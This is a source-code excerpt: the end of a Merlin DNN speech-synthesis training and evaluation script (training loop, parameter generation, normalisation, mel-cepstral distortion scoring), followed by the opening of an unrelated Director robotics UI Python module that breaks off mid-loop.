n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, sequential = sequential_training, shuffle = True)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProvider(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list,
n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, sequential = sequential_training, shuffle = False)
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_one_partition()
train_set_x, train_set_y = shared_train_set_xy
shared_valid_set_xy, valid_set_x, valid_set_y = valid_data_reader.load_one_partition() #validation data is still read block by block
valid_set_x, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
##temporarily we use the training set as pretrain_set_x.
##we need to support any data for pretraining
# pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all models support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same; reserved to compute multi-stream distortion
if model_type == 'DNN':
# dnn_model = DeepRecurrentNetwork(n_in= n_ins, hidden_layer_size = hidden_layer_size, n_out = n_outs, L1_reg = l1_reg, L2_reg = l2_reg, hidden_layer_type = hidden_layer_type)
# dnn_model = SequentialDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
# l1_reg = l1_reg, l2_reg = l2_reg,
# hidden_layer_sizes = hidden_layer_size)
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layer_sizes = hidden_layer_size)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise ValueError('%s type NN model is not supported' % model_type)
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.time()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
# finetune_lr = 0.000125
previous_finetune_lr = finetune_lr
print(finetune_lr)
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
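# Sketch of the schedule implemented above: during the warmup epochs the learning rate stays at
# finetune_lr; afterwards it is halved every epoch, i.e. lr_e = finetune_lr * 0.5**(e - warmup_epoch).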
train_error = []
all_batches = 0
sub_start_time = time.time()
while (not train_data_reader.is_finish()):
shared_train_set_xy, train_set_x, train_set_y = train_data_reader.load_one_partition()
n_train_batches = train_set_x.shape[0] // batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.shape[0], n_train_batches, batch_size) )
all_batches = all_batches + n_train_batches
for minibatch_index in range(n_train_batches):
this_train_error = dnn_model.finetune((train_set_x[minibatch_index*batch_size:(minibatch_index+1)*batch_size, :], \
train_set_y[minibatch_index*batch_size:(minibatch_index+1)*batch_size, :]), batch_size, current_finetune_lr, current_momentum)
train_error.extend(this_train_error)
train_data_reader.reset()
logger.debug('calculating validation loss')
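# The validation loss below is the mean over frames of the per-frame sum of squared errors across all
# output dimensions (computed in the normalised feature domain); the reported training loss is the mean
# of the per-minibatch errors collected during fine-tuning.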
predicted_parameter = dnn_model.parameter_prediction(valid_set_x) #, valid_set_y
validation_losses = numpy.sum((predicted_parameter - valid_set_y) ** 2, axis=1)
this_validation_loss = numpy.mean(validation_losses)
this_train_valid_loss = numpy.mean(numpy.asarray(train_error))
sub_end_time = time.time()
loss_difference = this_validation_loss - previous_loss
logger.info('epoch %i, validation error %f, train error %f time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
if epoch > 10:
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
# logger.debug('validation loss decreased, so saving model')
if this_validation_loss >= previous_loss:
logger.debug('validation loss increased')
# dbn = best_dnn_model
early_stop += 1
# if early_stop > early_stop_epoch:
# logger.debug('stopping early')
# break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
end_time = time.time()
# cPickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
return best_validation_loss
def dnn_generation(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
file_number = len(valid_file_list)
for i in range(file_number): #file_number
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size // n_ins))]
test_set_x = features.reshape((-1, n_ins))
predicted_parameter = dnn_model.parameter_prediction(test_set_x)
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
def dnn_generation_lstm(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
visualize_dnn(dnn_model)
file_number = len(valid_file_list)
for i in range(file_number): #file_number
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size // n_ins))]
test_set_x = features.reshape((-1, n_ins))
predicted_parameter = dnn_model.parameter_prediction_lstm(test_set_x)
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
def main_function(cfg):
# get a logger for this main function
logger = logging.getLogger("main")
# get another logger to handle plotting duties
plotlogger = logging.getLogger("plotting")
# later, we might do this via a handler that is created, attached and configured
# using the standard config mechanism of the logging module
# but for now we need to do it manually
plotlogger.set_plot_path(cfg.plot_dir)
#### parameter setting########
hidden_layer_size = cfg.hyper_params['hidden_layer_size']
####prepare environment
try:
file_id_list = read_file_list(cfg.file_id_scp)
logger.debug('Loaded file id list from %s' % cfg.file_id_scp)
except IOError:
# this means that open(...) threw an error
logger.critical('Could not load file id list from %s' % cfg.file_id_scp)
raise
###total file number including training, development, and testing
total_file_number = len(file_id_list)
data_dir = cfg.data_dir
nn_cmp_dir = os.path.join(data_dir, 'nn' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
nn_cmp_norm_dir = os.path.join(data_dir, 'nn_norm' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
model_dir = os.path.join(cfg.work_dir, 'nnets_model')
gen_dir = os.path.join(cfg.work_dir, 'gen')
in_file_list_dict = {}
for feature_name in list(cfg.in_dir_dict.keys()):
in_file_list_dict[feature_name] = prepare_file_path_list(file_id_list, cfg.in_dir_dict[feature_name], cfg.file_extension_dict[feature_name], False)
nn_cmp_file_list = prepare_file_path_list(file_id_list, nn_cmp_dir, cfg.cmp_ext)
nn_cmp_norm_file_list = prepare_file_path_list(file_id_list, nn_cmp_norm_dir, cfg.cmp_ext)
###normalisation information
norm_info_file = os.path.join(data_dir, 'norm_info' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim) + '_' + cfg.output_feature_normalisation + '.dat')
### normalise input full context label
# currently supporting two different forms of linguistic features
# later, we should generalise this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension + cfg.appended_input_dim
logger.info('Input label dimension is %d' % lab_dim)
suffix=str(lab_dim)
# no longer supported - use new "composed" style labels instead
elif cfg.label_style == 'composed':
# label_normaliser = XMLLabelNormalisation(xpath_file_name=cfg.xpath_file_name)
suffix='composed'
if cfg.process_labels_in_work_dir:
label_data_dir = cfg.work_dir
else:
label_data_dir = data_dir
# the number can be removed
binary_label_dir = os.path.join(label_data_dir, 'binary_label_'+suffix)
nn_label_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_'+suffix)
nn_label_norm_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_norm_'+suffix)
in_label_align_file_list = prepare_file_path_list(file_id_list, cfg.in_label_align_dir, cfg.lab_ext, False)
binary_label_file_list = prepare_file_path_list(file_id_list, binary_label_dir, cfg.lab_ext)
nn_label_file_list = prepare_file_path_list(file_id_list, nn_label_dir, cfg.lab_ext)
nn_label_norm_file_list = prepare_file_path_list(file_id_list, nn_label_norm_dir, cfg.lab_ext)
# to do - sanity check the label dimension here?
min_max_normaliser = None
label_norm_file = 'label_norm_%s.dat' %(cfg.label_style)
label_norm_file = os.path.join(label_data_dir, label_norm_file)
if cfg.NORMLAB and (cfg.label_style == 'HTS'):
# simple HTS labels
logger.info('preparing label data (input) using standard HTS style labels')
label_normaliser.perform_normalisation(in_label_align_file_list, binary_label_file_list)
remover = SilenceRemover(n_cmp = lab_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(binary_label_file_list, in_label_align_file_list, nn_label_file_list)
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99)
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if cfg.NORMLAB and (cfg.label_style == 'composed'):
# new flexible label preprocessor
logger.info('preparing label data (input) using "composed" style labels')
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
logger.info('Loaded label configuration')
# logger.info('%s' % label_composer.configuration.labels )
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension will be %d' % lab_dim)
if cfg.precompile_xpaths:
label_composer.precompile_xpaths()
# there is now a set of parallel input label files (e.g., one set of HTS labels and another set of Ossian trees)
# create all the lists of these, ready to pass to the label composer
in_label_align_file_list = {}
for label_style, label_style_required in label_composer.label_styles.items():
if label_style_required:
logger.info('labels of style %s are required - constructing file paths for them' % label_style)
if label_style == 'xpath':
in_label_align_file_list['xpath'] = prepare_file_path_list(file_id_list, cfg.xpath_label_align_dir, cfg.utt_ext, False)
elif label_style == 'hts':
in_label_align_file_list['hts'] = prepare_file_path_list(file_id_list, cfg.hts_label_align_dir, cfg.lab_ext, False)
else:
logger.critical('unsupported label style %s specified in label configuration' % label_style)
raise Exception
# now iterate through the files, one at a time, constructing the labels for them
num_files=len(file_id_list)
logger.info('the label styles required are %s' % label_composer.label_styles)
for i in range(num_files):
logger.info('making input label features for %4d of %4d' % (i+1,num_files))
# iterate through the required label styles and open each corresponding label file
# a dictionary of file descriptors, pointing at the required files
required_labels={}
for label_style, label_style_required in label_composer.label_styles.items():
# the files will be a parallel set of files for a single utterance
# e.g., the XML tree and an HTS label file
if label_style_required:
required_labels[label_style] = open(in_label_align_file_list[label_style][i] , 'r')
logger.debug(' opening label file %s' % in_label_align_file_list[label_style][i])
logger.debug('label styles with open files: %s' % required_labels)
label_composer.make_labels(required_labels,out_file_name=binary_label_file_list[i],fill_missing_values=cfg.fill_missing_values,iterate_over_frames=cfg.iterate_over_frames)
# now close all opened files
for fd in required_labels.values():
fd.close()
# silence removal
if cfg.remove_silence_using_binary_labels:
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from label using silence feature: %s'%(label_composer.configuration.labels[silence_feature]))
logger.info('Silence will be removed from CMP files in same way')
## Binary labels have 2 roles: both the thing trimmed and the instructions for trimming:
trim_silence(binary_label_file_list, nn_label_file_list, lab_dim, \
binary_label_file_list, lab_dim, silence_feature)
else:
logger.info('No silence removal done')
# start from the labels we have just produced, not trimmed versions
nn_label_file_list = binary_label_file_list
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99)
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if min_max_normaliser is not None:
### save label normalisation information for unseen testing labels
label_min_vector = min_max_normaliser.min_vector
label_max_vector = min_max_normaliser.max_vector
label_norm_info = numpy.concatenate((label_min_vector, label_max_vector), axis=0)
label_norm_info = numpy.array(label_norm_info, 'float32')
fid = open(label_norm_file, 'wb')
label_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(label_min_vector.size, label_norm_file))
### make output acoustic data
if cfg.MAKECMP:
logger.info('creating acoustic (output) features')
delta_win = cfg.delta_win #[-0.5, 0.0, 0.5]
acc_win = cfg.acc_win #[1.0, -2.0, 1.0]
acoustic_worker = AcousticComposition(delta_win = delta_win, acc_win = acc_win)
acoustic_worker.prepare_nn_data(in_file_list_dict, nn_cmp_file_list, cfg.in_dimension_dict, cfg.out_dimension_dict)
if cfg.remove_silence_using_binary_labels:
## do this to get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from CMP using binary label file')
## overwrite the untrimmed audio with the trimmed version:
trim_silence(nn_cmp_file_list, nn_cmp_file_list, cfg.cmp_dim,
binary_label_file_list, lab_dim, silence_feature)
else: ## back off to previous method using HTS labels:
remover = SilenceRemover(n_cmp = cfg.cmp_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(nn_cmp_file_list[0:cfg.train_file_number+cfg.valid_file_number],
in_label_align_file_list[0:cfg.train_file_number+cfg.valid_file_number],
nn_cmp_file_list[0:cfg.train_file_number+cfg.valid_file_number]) # save to itself
### save acoustic normalisation information for normalising the features back
var_dir = os.path.join(data_dir, 'var')
if not os.path.exists(var_dir):
os.makedirs(var_dir)
var_file_dict = {}
for feature_name in list(cfg.out_dimension_dict.keys()):
var_file_dict[feature_name] = os.path.join(var_dir, feature_name + '_' + str(cfg.out_dimension_dict[feature_name]))
### normalise output acoustic data
if cfg.NORMCMP:
logger.info('normalising acoustic (output) features using method %s' % cfg.output_feature_normalisation)
cmp_norm_info = None
if cfg.output_feature_normalisation == 'MVN':
normaliser = MeanVarianceNorm(feature_dimension=cfg.cmp_dim)
###calculate mean and std vectors on the training data, and apply on the whole dataset
global_mean_vector = normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number], 0, cfg.cmp_dim)
global_std_vector = normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector, 0, cfg.cmp_dim)
normaliser.feature_normalisation(nn_cmp_file_list[0:cfg.train_file_number+cfg.valid_file_number],
nn_cmp_norm_file_list[0:cfg.train_file_number+cfg.valid_file_number])
cmp_norm_info = numpy.concatenate((global_mean_vector, global_std_vector), axis=0)
elif cfg.output_feature_normalisation == 'MINMAX':
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim)
global_mean_vector = min_max_normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number])
global_std_vector = min_max_normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector)
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim, min_value = 0.01, max_value = 0.99)
min_max_normaliser.find_min_max_values(nn_cmp_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_cmp_file_list, nn_cmp_norm_file_list)
cmp_min_vector = min_max_normaliser.min_vector
cmp_max_vector = min_max_normaliser.max_vector
cmp_norm_info = numpy.concatenate((cmp_min_vector, cmp_max_vector), axis=0)
else:
logger.critical('Normalisation type %s is not supported!\n' %(cfg.output_feature_normalisation))
raise ValueError('Normalisation type %s is not supported' % cfg.output_feature_normalisation)
cmp_norm_info = numpy.array(cmp_norm_info, 'float32')
fid = open(norm_info_file, 'wb')
cmp_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(cfg.output_feature_normalisation, norm_info_file))
feature_index = 0
for feature_name in list(cfg.out_dimension_dict.keys()):
feature_std_vector = numpy.array(global_std_vector[:,feature_index:feature_index+cfg.out_dimension_dict[feature_name]], 'float32')
fid = open(var_file_dict[feature_name], 'wb')
feature_std_vector.tofile(fid)
fid.close()
logger.info('saved %s variance vector to %s' %(feature_name, var_file_dict[feature_name]))
feature_index += cfg.out_dimension_dict[feature_name]
train_x_file_list = nn_label_norm_file_list[0:cfg.train_file_number]
train_y_file_list = nn_cmp_norm_file_list[0:cfg.train_file_number]
valid_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
valid_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
# we need to know the label dimension before training the DNN
# computing that requires us to look at the labels
#
# currently, there are two ways to do this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension + cfg.appended_input_dim
elif cfg.label_style == 'composed':
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension is %d' % lab_dim)
combined_model_arch = str(len(hidden_layer_size))
for hid_size in hidden_layer_size:
combined_model_arch += '_' + str(hid_size)
nnets_file_name = '%s/%s_%s_%d_%s_%d.%d.train.%d.%f.nn.model' \
%(model_dir, cfg.combined_model_name, cfg.combined_feature_name, int(cfg.multistream_switch),
combined_model_arch, lab_dim, cfg.cmp_dim, cfg.train_file_number, cfg.hyper_params['learning_rate'])
### DNN model training
if cfg.TRAINDNN:
var_dict = load_covariance(var_file_dict, cfg.out_dimension_dict)
logger.info('training DNN')
fid = open(norm_info_file, 'rb')
cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
fid.close()
cmp_min_max = cmp_min_max.reshape((2, -1))
cmp_mean_vector = cmp_min_max[0, ]
cmp_std_vector = cmp_min_max[1, ]
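# norm_info_file holds two stacked rows (see the NORMCMP step above): mean/std when
# output_feature_normalisation is 'MVN', min/max when it is 'MINMAX'; the mean/std names
# used here therefore assume MVN normalisation was applied.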
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create model directory %s' % model_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
try:
train_DNN(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot, var_dict = var_dict,
cmp_mean_vector = cmp_mean_vector, cmp_std_vector = cmp_std_vector)
except KeyboardInterrupt:
logger.critical('train_DNN interrupted via keyboard')
# Could 'raise' the exception further, but that causes a deep traceback to be printed
# which we don't care about for a keyboard interrupt. So, just bail out immediately
sys.exit(1)
except:
logger.critical('train_DNN threw an exception')
raise
### generate parameters from DNN
temp_dir_name = '%s_%s_%d_%d_%d_%d_%d_%d' \
%(cfg.combined_model_name, cfg.combined_feature_name, int(cfg.do_post_filtering), \
cfg.train_file_number, lab_dim, cfg.cmp_dim, \
len(hidden_layer_size), hidden_layer_size[0])
gen_dir = os.path.join(gen_dir, temp_dir_name)
gen_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.DNNGEN:
logger.info('generating from DNN')
try:
os.makedirs(gen_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create generation directory %s' % gen_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
gen_file_list = prepare_file_path_list(gen_file_id_list, gen_dir, cfg.cmp_ext)
dnn_generation(test_x_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list)
logger.debug('denormalising generated output using method %s' % cfg.output_feature_normalisation)
fid = open(norm_info_file, 'rb')
cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
fid.close()
cmp_min_max = cmp_min_max.reshape((2, -1))
cmp_min_vector = cmp_min_max[0, ]
cmp_max_vector = cmp_min_max[1, ]
if cfg.output_feature_normalisation == 'MVN':
denormaliser = MeanVarianceNorm(feature_dimension = cfg.cmp_dim)
denormaliser.feature_denormalisation(gen_file_list, gen_file_list, cmp_min_vector, cmp_max_vector)
elif cfg.output_feature_normalisation == 'MINMAX':
denormaliser = MinMaxNormalisation(cfg.cmp_dim, min_value = 0.01, max_value = 0.99, min_vector = cmp_min_vector, max_vector = cmp_max_vector)
denormaliser.denormalise_data(gen_file_list, gen_file_list)
else:
logger.critical('denormalising method %s is not supported!\n' %(cfg.output_feature_normalisation))
raise ValueError('denormalising method %s is not supported' % cfg.output_feature_normalisation)
##perform MLPG to smooth parameter trajectory
## if lf0 is included, the output features must have vuv.
generator = ParameterGeneration(gen_wav_features = cfg.gen_wav_features)
generator.acoustic_decomposition(gen_file_list, cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict, var_file_dict)
### generate wav
if cfg.GENWAV:
logger.info('reconstructing waveform(s)')
print(len(gen_file_id_list))
generate_wav(gen_dir, gen_file_id_list[cfg.valid_file_number:cfg.valid_file_number+cfg.test_file_number], cfg) # generated speech
# generate_wav(nn_cmp_dir, gen_file_id_list) # reference copy synthesis speech
### evaluation: calculate distortion
if cfg.CALMCD:
logger.info('calculating MCD')
ref_data_dir = os.path.join(data_dir, 'ref_data')
ref_mgc_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.mgc_ext)
ref_bap_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.bap_ext)
ref_lf0_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.lf0_ext)
in_gen_label_align_file_list = in_label_align_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
calculator = IndividualDistortionComp()
spectral_distortion = 0.0
bap_mse = 0.0
f0_mse = 0.0
vuv_error = 0.0
valid_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_file_id_list = file_id_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.remove_silence_using_binary_labels:
## get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
## use first feature in label -- hardcoded for now
silence_feature = 0
## Use these to trim silence:
untrimmed_test_labels = binary_label_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if 'mgc' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_mgc_list, cfg.mgc_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.mgc_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_mgc_list)
valid_spectral_distortion = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
test_spectral_distortion = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
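# The distortion returned above is assumed to be a mean Euclidean distance over mel-cepstra;
# multiplying by (10/ln 10)*sqrt(2) below converts it to the usual mel-cepstral distortion in dB:
# MCD = (10/ln 10) * sqrt(2 * sum_d (c_d - c'_d)^2).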
valid_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
test_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
if 'bap' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_bap_list, cfg.bap_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.bap_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_bap_list)
valid_bap_mse = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
test_bap_mse = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
valid_bap_mse = valid_bap_mse / 10.0 ##Cassia's bap is computed from 10*log|S(w)|; if using HTS/SPTK-style bap, apply the same scaling as for MGC
test_bap_mse = test_bap_mse / 10.0 ##Cassia's bap is computed from 10*log|S(w)|; if using HTS/SPTK-style bap, apply the same scaling as for MGC
if 'lf0' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_lf0_list, cfg.lf0_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.lf0_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_lf0_list)
valid_f0_mse, valid_vuv_error = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
test_f0_mse , test_vuv_error = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
logger.info('Develop: DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(valid_spectral_distortion, valid_bap_mse, valid_f0_mse, valid_vuv_error*100.))
logger.info('Test : DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(test_spectral_distortion , test_bap_mse , test_f0_mse , test_vuv_error*100.))
if __name__ == '__main__':
# these things should be done even before trying to parse the command line
# create a configuration instance
# and get a short name for this instance
cfg=configuration.cfg
# set up logging to use our custom class
logging.setLoggerClass(LoggerPlotter)
# get a logger for this main function
logger = logging.getLogger("main")
if len(sys.argv) != 2:
logger.critical('usage: run_dnn.sh [config file name]')
sys.exit(1)
config_file = sys.argv[1]
config_file = os.path.abspath(config_file)
cfg.configure(config_file)
if cfg.profile:
logger.info('profiling is activated')
import cProfile, pstats
cProfile.run('main_function(cfg)', 'mainstats')
# create a stream for the profiler to write to
profiling_output = io.StringIO()
p = pstats.Stats('mainstats', stream=profiling_output)
# print stats to that stream
# here we just report the top 10 functions, sorted by total amount of time spent in each
p.strip_dirs().sort_stats('tottime').print_stats(10)
# print the result to the log
logger.info('---Profiling result follows---\n%s' % profiling_output.getvalue() )
profiling_output.close()
logger.info('---End of profiling result---')
else:
main_function(cfg)
# if gnp._boardId is not None:
# import gpu_lock
# gpu_lock.free_lock(gnp._boardId)
sys.exit(0)
| bajibabu/merlin | misc/recipes/MGE/run_dnn_cm.py | Python | apache-2.0 | 42653 | ["NEURON"] | 6ba5a764431219b56a3df6ce0a655a29b3e24b18db7e499494b7df1282e3a838 |
import PythonQt
from PythonQt import QtCore, QtGui, QtUiTools
import director.applogic as app
import director.objectmodel as om
from director.timercallback import TimerCallback
from director import robotstate
from director import visualization as vis
from director import transformUtils
from director import ikconstraints
from director import ikplanner
from director import vtkAll as vtk
from director import drcargs
from director import affordanceurdf
from director.roboturdf import HandFactory
from director.utime import getUtime
from director import lcmUtils
import functools
import math
import numpy as np
import types
import lcm
import bot_core as lcmbotcore
def addWidgetsToDict(widgets, d):
for widget in widgets:
if widget.objectName:
d[str(widget.objectName)] = widget
addWidgetsToDict(widget.children(), d)
class WidgetDict(object):
def __init__(self, widgets):
addWidgetsToDict(widgets, self.__dict__)
def clearLayout(w):
children = w.findChildren(QtGui.QWidget)
for child in children:
child.delete()
class ConstraintItem(om.ObjectModelItem):
def __init__(self, constraint):
linkStr = '(%s)' % constraint.linkName if hasattr(constraint, 'linkName') else ''
name = '%s %s' % (type(constraint).__name__, linkStr)
om.ObjectModelItem.__init__(self, name)
self.constraint = constraint
for propertyName, propertyValue in constraint:
